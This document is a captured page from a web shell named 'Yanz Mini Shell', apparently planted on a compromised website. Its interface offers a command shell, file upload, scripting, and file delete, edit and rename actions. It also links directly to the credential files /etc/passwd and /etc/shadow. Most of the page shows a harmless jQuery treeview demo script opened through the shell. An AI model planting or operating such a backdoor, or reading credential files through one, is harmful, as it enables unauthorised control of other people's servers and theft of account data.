Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * Treeview (jquery) */ 'use strict'; $(function () { var theme = $('html').hasClass('light-style') ? 'default' : 'default-dark', basicTree = $('#jstree-basic'), customIconsTree = $('#jstree-custom-icons'), contextMenu = $('#jstree-context-menu'), dragDrop = $('#jstree-drag-drop'), checkboxTree = $('#jstree-checkbox'), ajaxTree = $('#jstree-ajax'); // Basic // -------------------------------------------------------------------- if (basicTree.length) { basicTree.jstree({ core: { themes: { name: theme } } }); } // Custom Icons // -------------------------------------------------------------------- if (customIconsTree.length) { customIconsTree.jstree({ core: { themes: { name: theme }, data: [ { text: 'css', children: [ { text: 'app.css', type: 'css' }, { text: 'style.css', type: 'css' } ] }, { text: 'img', state: { opened: true }, children: [ { text: 'bg.jpg', type: 'img' }, { text: 'logo.png', type: 'img' }, { text: 'avatar.png', type: 'img' } ] }, { text: 'js', state: { opened: true }, children: [ { text: 'jquery.js', type: 'js' }, { text: 'app.js', type: 'js' } ] }, { text: 'index.html', type: 'html' }, { text: 'page-one.html', type: 'html' }, { text: 'page-two.html', type: 'html' } ] }, plugins: ['types'], types: { default: { icon: 'ri-folder-3-line' }, html: { icon: 'ri-html5-fill text-danger' }, css: { icon: 'ri-css3-fill text-info' }, img: { icon: 'ri-image-fill text-success' }, js: { icon: 'ri-javascript-line text-warning' } } }); } // Context Menu // -------------------------------------------------------------------- if (contextMenu.length) { contextMenu.jstree({ core: { themes: { name: theme }, check_callback: true, data: [ { text: 'css', children: [ { text: 'app.css', type: 'css' }, { text: 'style.css', type: 'css' } ] }, { text: 'img', state: { opened: true }, children: [ { text: 'bg.jpg', type: 'img' }, { text: 'logo.png', type: 'img' }, { text: 'avatar.png', type: 'img' } ] }, { text: 'js', state: { opened: true }, children: [ { text: 'jquery.js', type: 'js' }, { text: 'app.js', type: 'js' } ] }, { text: 'index.html', type: 'html' }, { text: 'page-one.html', type: 'html' }, { text: 'page-two.html', type: 'html' } ] }, plugins: ['types', 'contextmenu'], types: { default: { icon: 'ri-folder-3-line' }, html: { icon: 'ri-html5-fill text-danger' }, css: { icon: 'ri-css3-fill text-info' }, img: { icon: 'ri-image-fill text-success' }, js: { icon: 'ri-javascript-line text-warning' } } }); } // Drag Drop // -------------------------------------------------------------------- if (dragDrop.length) { dragDrop.jstree({ core: { themes: { name: theme }, check_callback: true, data: [ { text: 'css', children: [ { text: 'app.css', type: 'css' }, { text: 'style.css', type: 'css' } ] }, { text: 'img', state: { opened: true }, children: [ { text: 'bg.jpg', type: 'img' }, { text: 'logo.png', type: 'img' }, { text: 'avatar.png', type: 'img' } ] }, { text: 'js', state: { opened: true }, children: [ { text: 'jquery.js', type: 'js' }, { text: 'app.js', type: 'js' } ] }, { text: 'index.html', type: 'html' }, { text: 'page-one.html', type: 'html' }, { text: 'page-two.html', type: 'html' } ] }, plugins: ['types', 'dnd'], types: { default: { icon: 'ri-folder-3-line' }, html: { icon: 'ri-html5-fill text-danger' }, css: { icon: 'ri-css3-fill text-info' }, img: { icon: 'ri-image-fill text-success' }, js: { icon: 'ri-javascript-line text-warning' } } }); } // Checkbox // -------------------------------------------------------------------- if (checkboxTree.length) { checkboxTree.jstree({ core: { themes: { name: theme }, data: [ { text: 'css', children: [ { text: 'app.css', type: 'css' }, { text: 'style.css', type: 'css' } ] }, { text: 'img', state: { opened: true }, children: [ { text: 'bg.jpg', type: 'img' }, { text: 'logo.png', type: 'img' }, { text: 'avatar.png', type: 'img' } ] }, { text: 'js', state: { opened: true }, children: [ { text: 'jquery.js', type: 'js' }, { text: 'app.js', type: 'js' } ] }, { text: 'index.html', type: 'html' }, { text: 'page-one.html', type: 'html' }, { text: 'page-two.html', type: 'html' } ] }, plugins: ['types', 'checkbox', 'wholerow'], types: { default: { icon: 'ri-folder-3-line' }, html: { icon: 'ri-html5-fill text-danger' }, css: { icon: 'ri-css3-fill text-info' }, img: { icon: 'ri-image-fill text-success' }, js: { icon: 'ri-javascript-line text-warning' } } }); } // Ajax Example // -------------------------------------------------------------------- if (ajaxTree.length) { ajaxTree.jstree({ core: { themes: { name: theme }, data: { url: assetsPath + 'json/jstree-data.json', dataType: 'json', data: function (node) { return { id: node.id }; } } }, plugins: ['types', 'state'], types: { default: { icon: 'ri-folder-3-line' }, html: { icon: 'ri-html5-fill text-danger' }, css: { icon: 'ri-css3-fill text-info' }, img: { icon: 'ri-image-fill text-success' }, js: { icon: 'ri-javascript-line text-warning' } } }); } });
Free Space : 107686256640 Byte